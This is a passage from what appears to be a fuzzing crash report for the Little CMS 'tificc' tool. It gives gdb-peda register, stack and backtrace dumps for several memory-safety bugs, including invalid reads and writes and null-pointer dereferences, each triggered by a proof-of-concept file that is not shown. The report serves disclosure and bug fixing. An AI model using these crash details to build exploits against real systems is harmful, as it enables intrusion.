, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 489 | #23 0x0000000000401fe9 in _start () 490 | 491 | ``` 492 | 493 | 494 | ## 10-cms-invalid-read-PackPlanarBytes 495 | 496 | 497 | ``` 498 | gdb --args tificc $POC /tmp/out.tiff 499 | Program received signal SIGSEGV, Segmentation fault. 500 | [----------------------------------registers-----------------------------------] 501 | RAX: 0x70c810 502 | RBX: 0x7ffff5959014 --> 0x0 503 | RCX: 0x100020 504 | RDX: 0x0 505 | RSI: 0x7fffffffe300 --> 0x0 506 | RDI: 0x60c2a0 --> 0x4101900441094 507 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 508 | RSP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 509 | RIP: 0x7ffff7b9003e (: mov BYTE PTR [rax],dl) 510 | R8 : 0x2ce 511 | R9 : 0x7fffffffe380 --> 0x0 512 | R10: 0x15b 513 | R11: 0x7ffff7b97389 (: push rbp) 514 | R12: 0x60c7f0 --> 0x7ffff76cf100 --> 0x7ffff76cf0e8 --> 0x7ffff76cf0d8 --> 0x7ffff76cf0c8 --> 0x7ffff76cf0b8 (--> ...) 515 | R13: 0x7fffffffe610 --> 0x3 516 | R14: 0x0 517 | R15: 0x0 518 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 519 | [-------------------------------------code-------------------------------------] 520 | 0x7ffff7b90036 : not edx 521 | 0x7ffff7b90038 : jmp 0x7ffff7b9003e 522 | 0x7ffff7b9003a : movzx edx,BYTE PTR [rbp-0x21] 523 | => 0x7ffff7b9003e : mov BYTE PTR [rax],dl 524 | 0x7ffff7b90040 : mov edx,ecx 525 | 0x7ffff7b90042 : add rax,rdx 526 | 0x7ffff7b90045 : add DWORD PTR [rbp-0x20],0x1 527 | 0x7ffff7b90049 : mov edx,DWORD PTR [rbp-0x20] 528 | [------------------------------------stack-------------------------------------] 529 | 0000| 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 530 | 0008| 0x7fffffffe298 --> 0x7ffff7b97b7f (: mov r12,rax) 531 | 0016| 0x7fffffffe2a0 --> 0x0 532 | 0024| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 533 | 0032| 0x7fffffffe2b0 --> 0x10002000000001 534 | 0040| 0x7fffffffe2b8 --> 0x60c7f0 --> 0x7ffff76cf100 --> 0x7ffff76cf0e8 --> 0x7ffff76cf0d8 --> 0x7ffff76cf0c8 (--> ...) 535 | 0048| 0x7fffffffe2c0 --> 0x7ffff5959010 --> 0x0 536 | 0056| 0x7fffffffe2c8 --> 0x60c2a0 --> 0x4101900441094 537 | [------------------------------------------------------------------------------] 538 | Legend: code, data, rodata, value 539 | Stopped reason: SIGSEGV 540 | 0x00007ffff7b9003e in PackPlanarBytes (info=0x60c2a0, wOut=0x7fffffffe300, output=0x70c810 , Stride=0x100020) at ../../cms/src/cmspack.c:1458 541 | 1458 *(cmsUInt8Number*) output = (cmsUInt8Number) (Reverse ? REVERSE_FLAVOR_8(v) : v); 542 | gdb-peda$ p output 543 | $1 = (cmsUInt8Number *) 0x70c810 544 | 545 | 546 | ``` 547 | 548 | 549 | 550 | ## 11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages 551 | 552 | ``` 553 | gdb --args tificc $POC /tmp/out.tiff 554 | Program received signal SIGILL, Illegal instruction. 555 | [----------------------------------registers-----------------------------------] 556 | RAX: 0x7ffff7b85300 (: test DWORD PTR [rax],ebp) 557 | RBX: 0x7fffffffe300 --> 0xffff 558 | RCX: 0x7fffffffde70 --> 0x3f800000 559 | RDX: 0x60ea50 --> 0x0 560 | RSI: 0x7fffffffe070 --> 0x3f800000 561 | RDI: 0x7fffffffde70 --> 0x3f800000 562 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 563 | RSP: 0x7fffffffde48 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 564 | RIP: 0x7ffff7b85302 (: (bad)) 565 | R8 : 0x2ce 566 | R9 : 0x7fffffffe380 --> 0x0 567 | R10: 0x15b 568 | R11: 0x7ffff7b97389 (: push rbp) 569 | R12: 0x60cc49 --> 0x5afb53fb4bfb44fb 570 | R13: 0x7fffffffe610 --> 0x3 571 | R14: 0x0 572 | R15: 0x0 573 | EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) 574 | [-------------------------------------code-------------------------------------] 575 | => 0x7ffff7b85302 : (bad) 576 | 0x7ffff7b85303 : (bad) 577 | 0x7ffff7b85304 : dec DWORD PTR [rax-0x75] 578 | 0x7ffff7b85307 : xchg ebp,eax 579 | [------------------------------------stack-------------------------------------] 580 | 0000| 0x7fffffffde48 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 581 | 0008| 0x7fffffffde50 --> 0x7ffff7b68410 --> 0x5f6e6f6d675f5f00 ('') 582 | 0016| 0x7fffffffde58 --> 0x100000000 583 | 0024| 0x7fffffffde60 --> 0x60ea50 --> 0x0 584 | 0032| 0x7fffffffde68 --> 0x609ee0 --> 0x60ea50 --> 0x0 585 | 0040| 0x7fffffffde70 --> 0x3f800000 586 | 0048| 0x7fffffffde78 --> 0x7fff00000000 587 | 0056| 0x7fffffffde80 --> 0x7fffffffdf14 --> 0x609c9800000000 588 | [------------------------------------------------------------------------------] 589 | Legend: code, data, rodata, value 590 | Stopped reason: SIGILL 591 | 0x00007ffff7b85302 in cmsPipelineCheckAndRetreiveStages (Lut=0x608088, n=0x0) at ../../cms/src/cmslut.c:143 592 | 143 *ElemPtr = mpe; 593 | gdb-peda$ bt 594 | #0 0x00007ffff7b85302 in cmsPipelineCheckAndRetreiveStages (Lut=0x608088, n=0x0) at ../../cms/src/cmslut.c:143 595 | #1 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60c2a0, in=0x626580, out=0x60c7f0, PixelsPerLine=0x1e20, LineCount=0x1, Stride=0x7fffffffe380) at ../../cms/src/cmsxform.c:411 596 | #2 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c2a0, InputBuffer=0x626580, OutputBuffer=0x60c7f0, Size=0x1e20) at ../../cms/src/cmsxform.c:189 597 | #3 0x0000000000402d73 in TileBasedXform (hXForm=0x60c2a0, in=0x609860, out=0x60a480, nPlanes=0x3) at ../../../cms/utils/tificc/tificc.c:408 598 | #4 0x00000000004044db in TransformImage (in=0x609860, out=0x60a480, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 599 | #5 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 600 | #6 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 601 | #7 0x0000000000401fe9 in _start () 602 | gdb-peda$ p ElemPtr 603 | $1 = (void **) 0xc0dfff9fe2b9c1c6 604 | gdb-peda$ p *ElemPtr 605 | Cannot access memory at address 0xc0dfff9fe2b9c1c6 606 | 607 | ``` 608 | 609 | ## 12-cms-invalid-access-EvaluateCurves 610 | 611 | ``` 612 | gdb --args tificc $POC /tmp/out.tiff 613 | Program received signal SIGSEGV, Segmentation fault. 614 | [----------------------------------registers-----------------------------------] 615 | RAX: 0xd54f63cff6bf3700 616 | RBX: 0x7fffffffe320 --> 0xffffffff 617 | RCX: 0x7fffffffde90 --> 0x3f8000003f800000 618 | RDX: 0x8b48108b 619 | RSI: 0x7fffffffe090 --> 0x3f8000003f800000 620 | RDI: 0x7fffffffde90 --> 0x3f8000003f800000 621 | RBP: 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 --> 0x7fffffffe430 --> 0x7fffffffe520 --> 0x7fffffffe550 (--> ...) 622 | RSP: 0x7fffffffde68 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 623 | RIP: 0x7ffff7b85405 (: mov rax,QWORD PTR [rax+0x8]) 624 | R8 : 0x2ce 625 | R9 : 0x7fffffffe3a0 --> 0x0 626 | R10: 0x15b 627 | R11: 0x7ffff7b97389 (: push rbp) 628 | R12: 0x60ccc9 --> 0x97fd90fd89fd82fd 629 | R13: 0x7fffffffe630 --> 0x3 630 | R14: 0x0 631 | R15: 0x0 632 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 633 | [-------------------------------------code-------------------------------------] 634 | 0x7ffff7b853fc : add rax,rdx 635 | 0x7ffff7b853ff : mov edx,DWORD PTR [rax] 636 | 0x7ffff7b85401 : mov rax,QWORD PTR [rbp-0x18] 637 | => 0x7ffff7b85405 : mov rax,QWORD PTR [rax+0x8] 638 | 0x7ffff7b85409 : mov ecx,DWORD PTR [rbp-0x1c] 639 | 0x7ffff7b8540c : shl rcx,0x3 640 | 0x7ffff7b85410 : add rax,rcx 641 | 0x7ffff7b85413 : mov rax,QWORD PTR [rax] 642 | [------------------------------------stack-------------------------------------] 643 | 0000| 0x7fffffffde68 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 644 | 0008| 0x7fffffffde70 --> 0x7ffff7b68410 --> 0x5f6e6f6d675f5f00 ('') 645 | 0016| 0x7fffffffde78 --> 0x100000000 646 | 0024| 0x7fffffffde80 --> 0x60ea30 ("&.6>K[k{\227\267\326\367", '\377' , "S\270\367\377\177") 647 | 0032| 0x7fffffffde88 --> 0x609ec0 --> 0x60ea30 ("&.6>K[k{\227\267\326\367", '\377' , "S\270\367\377\177") 648 | 0040| 0x7fffffffde90 --> 0x3f8000003f800000 649 | 0048| 0x7fffffffde98 --> 0x7fff00000000 650 | 0056| 0x7fffffffdea0 --> 0x7fffffffdf34 --> 0x609c9800000000 651 | [------------------------------------------------------------------------------] 652 | Legend: code, data, rodata, value 653 | Stopped reason: SIGSEGV 654 | 0x00007ffff7b85405 in EvaluateCurves (In=0x40efffe000000000, Out=0x100000001, mpe=0x1) at ../../cms/src/cmslut.c:182 655 | 182 Out[i] = cmsEvalToneCurveFloat(Data ->TheCurves[i], In[i]); 656 | gdb-peda$ p Out 657 | $1 = (cmsFloat32Number *) 0x100000001 658 | gdb-peda$ p Out[i] 659 | Cannot access memory at address 0x100000001 660 | 661 | 662 | ``` 663 | 664 | ## 13-cms-null-pointer-FastIdentity16 665 | 666 | ``` 667 | 668 | gdb --args tificc $POC /tmp/out.tiff 669 | Program received signal SIGSEGV, Segmentation fault. 670 | [----------------------------------registers-----------------------------------] 671 | RAX: 0x0 672 | RBX: 0x7ffff7fc9a98 --> 0x0 673 | RCX: 0x7fffffffe2e0 --> 0x0 674 | RDX: 0x0 675 | RSI: 0x7fffffffe300 --> 0x0 676 | RDI: 0x7fffffffe2e0 --> 0x0 677 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 678 | RSP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 679 | RIP: 0x7ffff7bbaa37 (: mov eax,DWORD PTR [rax+0x8]) 680 | R8 : 0x7fffffffe2e0 --> 0x0 681 | R9 : 0x7fffffffe380 --> 0x0 682 | R10: 0x15b 683 | R11: 0x7ffff7b97389 (: push rbp) 684 | R12: 0x615ca3 --> 0x50f849f842f83af8 685 | R13: 0x7fffffffe610 --> 0x3 686 | R14: 0x0 687 | R15: 0x0 688 | EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) 689 | [-------------------------------------code-------------------------------------] 690 | 0x7ffff7bbaa2c : mov WORD PTR [rdx],ax 691 | 0x7ffff7bbaa2f : add DWORD PTR [rbp-0xc],0x1 692 | 0x7ffff7bbaa33 : mov rax,QWORD PTR [rbp-0x8] 693 | => 0x7ffff7bbaa37 : mov eax,DWORD PTR [rax+0x8] 694 | 0x7ffff7bbaa3a : cmp eax,DWORD PTR [rbp-0xc] 695 | 0x7ffff7bbaa3d : ja 0x7ffff7bbaa16 696 | 0x7ffff7bbaa3f : nop 697 | 0x7ffff7bbaa40 : pop rbp 698 | [------------------------------------stack-------------------------------------] 699 | 0000| 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 700 | 0008| 0x7fffffffe298 --> 0x7ffff7b97b5e (: mov rax,QWORD PTR [rbp-0x78]) 701 | 0016| 0x7fffffffe2a0 --> 0x0 702 | 0024| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 703 | 0032| 0x7fffffffe2b0 --> 0x832000000001 704 | 0040| 0x7fffffffe2b8 --> 0x60df60 --> 0x0 705 | 0048| 0x7fffffffe2c0 --> 0x7ffff7fba010 --> 0x0 706 | 0056| 0x7fffffffe2c8 --> 0x60c2a0 --> 0x4101900041092 707 | [------------------------------------------------------------------------------] 708 | Legend: code, data, rodata, value 709 | Stopped reason: SIGSEGV 710 | 0x00007ffff7bbaa37 in FastIdentity16 (In=0x7fffffffe2e0, Out=0x7fffffffe300, D=0x0) at ../../cms/src/cmsopt.c:1371 711 | 1371 for (i=0; i < Lut ->InputChannels; i++) 712 | gdb-peda$ bt 713 | #0 0x00007ffff7bbaa37 in FastIdentity16 (In=0x7fffffffe2e0, Out=0x7fffffffe300, D=0x0) at ../../cms/src/cmsopt.c:1371 714 | #1 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60c2a0, in=0x7ffff7fba010, out=0x60df60, PixelsPerLine=0x8320, LineCount=0x1, Stride=0x7fffffffe380) at ../../cms/src/cmsxform.c:411 715 | #2 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c2a0, InputBuffer=0x7ffff7fba010, OutputBuffer=0x60df60, Size=0x8320) at ../../cms/src/cmsxform.c:189 716 | #3 0x0000000000402d73 in TileBasedXform (hXForm=0x60c2a0, in=0x609860, out=0x60a480, nPlanes=0x3) at ../../../cms/utils/tificc/tificc.c:408 717 | #4 0x00000000004044db in TransformImage (in=0x609860, out=0x60a480, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 718 | #5 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 719 | #6 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 720 | #7 0x0000000000401fe9 in _start () 721 | gdb-peda$ p Lut 722 | $1 = (cmsPipeline *) 0x0 723 | 724 | 725 | ``` 726 | 727 | 728 | 729 | ## 14-cms-invalid-access-Unroll1ByteReversed 730 | 731 | ``` 732 | 733 | gdb --args tificc $POC /tmp/out.tiff 734 | Program received signal SIGSEGV, Segmentation fault. 735 | [----------------------------------registers-----------------------------------] 736 | RAX: 0x7ffff7b8e600 (: mov r8d,edi) 737 | RBX: 0x6166ee --> 0x882588158805168e 738 | RCX: 0x1810 739 | RDX: 0x168e 740 | RSI: 0x168e 741 | RDI: 0xff9f168e 742 | RBP: 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 --> 0x405ad0 (<__libc_csu_init>: push r15) 743 | RSP: 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 744 | RIP: 0x7ffff7b8e61b (: mov WORD PTR [rcx],dx) 745 | R8 : 0x60e930 --> 0x87870087870087 746 | R9 : 0x7fffffffe380 --> 0x0 747 | R10: 0x15b 748 | R11: 0x7ffff7b97389 (: push rbp) 749 | R12: 0x60e941 --> 0xee00007ffff7b8e6 750 | R13: 0x7fffffffe610 --> 0x3 751 | R14: 0x0 752 | R15: 0x0 753 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 754 | [-------------------------------------code-------------------------------------] 755 | 0x7ffff7b8e612 : movzx esi,WORD PTR [rsi] 756 | 0x7ffff7b8e615 : mov WORD PTR [rdx],si 757 | 0x7ffff7b8e618 : movzx edx,WORD PTR [rdx] 758 | => 0x7ffff7b8e61b : mov WORD PTR [rcx],dx 759 | 0x7ffff7b8e61e : add rax,0x1 760 | 0x7ffff7b8e622 : pop rbp 761 | 0x7ffff7b8e623 : ret 762 | 0x7ffff7b8e624 : push rbp 763 | [------------------------------------stack-------------------------------------] 764 | 0000| 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 765 | 0008| 0x7fffffffe2a0 --> 0x0 766 | 0016| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 767 | 0024| 0x7fffffffe2b0 --> 0x181000000001 768 | 0032| 0x7fffffffe2b8 --> 0x60ade0 --> 0x7f00f20000f6f2 769 | 0040| 0x7fffffffe2c0 --> 0x60f040 --> 0x7ffff76cf2e8 --> 0x7ffff76cf2d8 --> 0x7ffff76cf2c8 --> 0x7ffff76cf2b8 (--> ...) 770 | 0048| 0x7fffffffe2c8 --> 0x60e930 --> 0x87870087870087 771 | 0056| 0x7fffffffe2d0 --> 0x13cb00000000 772 | [------------------------------------------------------------------------------] 773 | Legend: code, data, rodata, value 774 | Stopped reason: SIGSEGV 775 | 0x00007ffff7b8e61b in Unroll1ByteReversed (info=0xff9f168e, wIn=0x1810, accum=0x7ffff7b8e600 "A\211\370\017\266\070@\017\266\377D\t\307\367\327f\211>\017\267\066f\211\062\017\267\022f\211\021H\203\300\001]\303UH\211\345ATSH\203\354\060H\211\370I\211\364H\211\323\213\020\301\352\003\203\342\017\211U\320\213\020\301\352\v\203\342\001\211U\324\213\020\301\352\n\203\342\001\211U\330\213\020\301\352\r\203\342\001\211U\334\213\020\301\352\016\203\342\001\211U\340\213", Stride=0x1810) at ../../cms/src/cmspack.c:462 776 | 462 wIn[0] = wIn[1] = wIn[2] = REVERSE_FLAVOR_16(FROM_8_TO_16(*accum)); accum++; // L *) 777 | gdb-peda$ bt 778 | #0 0x00007ffff7b8e61b in Unroll1ByteReversed (info=0xff9f168e, wIn=0x1810, accum=0x7ffff7b8e600 "A\211\370\017\266\070@\017\266\377D\t\307\367\327f\211>\017\267\066f\211\062\017\267\022f\211\021H\203\300\001]\303UH\211\345ATSH\203\354\060H\211\370I\211\364H\211\323\213\020\301\352\003\203\342\017\211U\320\213\020\301\352\v\203\342\001\211U\324\213\020\301\352\n\203\342\001\211U\330\213\020\301\352\r\203\342\001\211U\334\213\020\301\352\016\203\342\001\211U\340\213", Stride=0x1810) at ../../cms/src/cmspack.c:462 779 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e930, InputBuffer=0x60f040, OutputBuffer=0x60ade0, Size=0x1810) at ../../cms/src/cmsxform.c:189 780 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60e930, in=0x609860, out=0x60a4c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 781 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 782 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 783 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 784 | #6 0x0000000000401fe9 in _start () 785 | gdb-peda$ p wIn[0] 786 | Cannot access memory at address 0x1810 787 | 788 | ``` 789 | 790 | 791 | ## 15-cms-null-pointer-UnrollAnyWords 792 | 793 | ``` 794 | gdb --args tificc $POC /tmp/out.tiff 795 | Program received signal SIGSEGV, Segmentation fault. 796 | [----------------------------------registers-----------------------------------] 797 | RAX: 0x7ffff7b8e6c3 (: or BYTE PTR [rbx+0x148ec45],cl) 798 | RBX: 0x62577e --> 0xc45cc452c448c43e 799 | RCX: 0x2e10 800 | RDX: 0x62577e --> 0xc45cc452c448c43e 801 | RSI: 0x7fffffffe2e0 --> 0xc402c3f8c3eec3e4 802 | RDI: 0x60e930 --> 0xc2c2c2c2c2c200c2 803 | RBP: 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 --> 0x405ad0 (<__libc_csu_init>: push r15) 804 | RSP: 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 805 | RIP: 0x7ffff7b8e6c3 (: or BYTE PTR [rbx+0x148ec45],cl) 806 | R8 : 0x1 807 | R9 : 0x7fffffffe380 --> 0x0 808 | R10: 0x15b 809 | R11: 0x7ffff7b97389 (: push rbp) 810 | R12: 0x60e941 --> 0xee00007ffff7b8e6 811 | R13: 0x7fffffffe610 --> 0x3 812 | R14: 0x0 813 | R15: 0x0 814 | EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) 815 | [-------------------------------------code-------------------------------------] 816 | => 0x7ffff7b8e6c3 : or BYTE PTR [rbx+0x148ec45],cl 817 | 0x7ffff7b8e6c9 : ror BYTE PTR [rcx-0x73],0x14 818 | 0x7ffff7b8e6cd : add al,0x83 819 | 0x7ffff7b8e6cf : jge 0x7ffff7b8e6ad 820 | [------------------------------------stack-------------------------------------] 821 | 0000| 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 822 | 0008| 0x7fffffffe2a0 --> 0x0 823 | 0016| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 824 | 0024| 0x7fffffffe2b0 --> 0x2e1000000001 825 | 0032| 0x7fffffffe2b8 --> 0x60ade0 --> 0xeb000000e7 826 | 0040| 0x7fffffffe2c0 --> 0x61e080 --> 0x60e7f0 --> 0xb500b5b500b5b500 827 | 0048| 0x7fffffffe2c8 --> 0x60e930 --> 0xc2c2c2c2c2c200c2 828 | 0056| 0x7fffffffe2d0 --> 0x13cb00000000 829 | [------------------------------------------------------------------------------] 830 | Legend: code, data, rodata, value 831 | Stopped reason: SIGSEGV 832 | 0x00007ffff7b8e6c3 in UnrollAnyWords (info=0x7ffff7b8e6c3 , wIn=0x60e941, accum=0x62577e ">\304H\304R\304\\\304e\304o\304y\304\203\304\215\304\227\304\241\304\253\304\265\304\277\304\311\304\323\304\335\304\347\304\361\304\373\304\005\305\017\305\031\305#\305,\305\066\305@\305J\305T\305^\305h\305r\305|\305\206\305\220\305\231\305\243\305\255\305\267\305\301\305\313\305\325\305\337\305\351\305\362\305\374\305\006\306\020\306\032\306$\306.\306\067\306A\306K\306U\306_\306i\306s\306|\306\206\306\220\306\232\306\244\306\256\306\267\306\301\306\313\306\325\306\337\306\350\306\362\306\374\306\006\307\020\307\031\307#\307-\307\067\307A\307J\307T\307^\307h\307r\307{\307\205\307\217\307\231\307\242\307\254\307\266\307\300\307\311\307\323\307\335\307\347\307\360\307\372\307\004\310\016\310"..., Stride=0x2e10) at ../../cms/src/cmspack.c:496 833 | 496 v = CHANGE_ENDIAN(v); 834 | gdb-peda$ bt 835 | #0 0x00007ffff7b8e6c3 in UnrollAnyWords (info=0x7ffff7b8e6c3 , wIn=0x60e941, accum=0x62577e ">\304H\304R\304\\\304e\304o\304y\304\203\304\215\304\227\304\241\304\253\304\265\304\277\304\311\304\323\304\335\304\347\304\361\304\373\304\005\305\017\305\031\305#\305,\305\066\305@\305J\305T\305^\305h\305r\305|\305\206\305\220\305\231\305\243\305\255\305\267\305\301\305\313\305\325\305\337\305\351\305\362\305\374\305\006\306\020\306\032\306$\306.\306\067\306A\306K\306U\306_\306i\306s\306|\306\206\306\220\306\232\306\244\306\256\306\267\306\301\306\313\306\325\306\337\306\350\306\362\306\374\306\006\307\020\307\031\307#\307-\307\067\307A\307J\307T\307^\307h\307r\307{\307\205\307\217\307\231\307\242\307\254\307\266\307\300\307\311\307\323\307\335\307\347\307\360\307\372\307\004\310\016\310"..., Stride=0x2e10) at ../../cms/src/cmspack.c:496 836 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e930, InputBuffer=0x61e080, OutputBuffer=0x60ade0, Size=0x2e10) at ../../cms/src/cmsxform.c:189 837 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60e930, in=0x609860, out=0x60a4c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 838 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 839 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 840 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 841 | #6 0x0000000000401fe9 in _start () 842 | gdb-peda$ p v 843 | $1 = 0x0 844 | 845 | 846 | ``` 847 | 848 | 849 | 850 | 851 | --------------------------------------------------------------------------------